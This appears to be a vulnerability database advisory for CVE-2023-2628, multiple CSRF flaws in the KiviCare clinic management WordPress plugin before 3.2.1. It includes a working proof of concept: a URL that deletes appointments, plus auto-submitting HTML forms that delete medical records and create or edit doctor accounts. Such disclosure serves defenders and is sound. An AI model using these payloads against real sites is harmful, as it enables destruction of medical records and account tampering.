Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
HistoryJun 05, 2023 - 12:00 a.m.

KiviCare Management System < 3.2.1 - Multiple CSRF

2023-06-0500:00:00
wpvulndb
146
csrf
admin actions
appointment deletion
medical record deletion
doctor creation
doctor edit

EPSS

0.002

Percentile

52.4%

JSON

The plugin does not have CSRF checks (either flawed or missing completely) in various AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: Delete arbitrary appointments/medical records/etc, create/update various users (patients, doctors etc)

Make a logged in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1

Make a logged in admin open a page with the HTML code below

To make them delete the medial record with ID 1:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="route_name" value="medical_records_delete"/>
        <input type="text" name="id" value="1">
        <input type="submit" value="submit">
    </form>
</body>

To make them create a new doctor:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="user_email" value="[email protected]">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

To edit an existing doctor, add the ID and the correct email to the code above, e.g
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="ID" value="8">
        <input type="text" name="user_email" value="[email protected]">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

(This will change their name, mobile number and gender as well as reset their specialisation etc)

Related

prion 1
cvelist 1
cve 1
wpvulndb 1
nvd 1
wordfence 1
prion
prion
Cross site request forgery (csrf)
2023-06-27 14:15:00
cvelist
cvelist
CVE-2023-2628 KiviCare Management System < 3.2.1 - Multiple CSRF
2023-06-27 13:17:22
cve
cve
CVE-2023-2628
2023-06-27 14:15:11
wpvulndb
wpvulndb
KiviCare Management System < 3.2.1 - Multiple CSRF
2023-06-05 00:00:00
nvd
nvd
CVE-2023-2628
2023-06-27 14:15:11
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (June 5, 2023 to June 11, 2023)
2023-06-15 13:04:14

EPSS

0.002

Percentile

52.4%

JSON
Related for WPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
prion1cvelist1cve1wpvulndb1nvd1wordfence1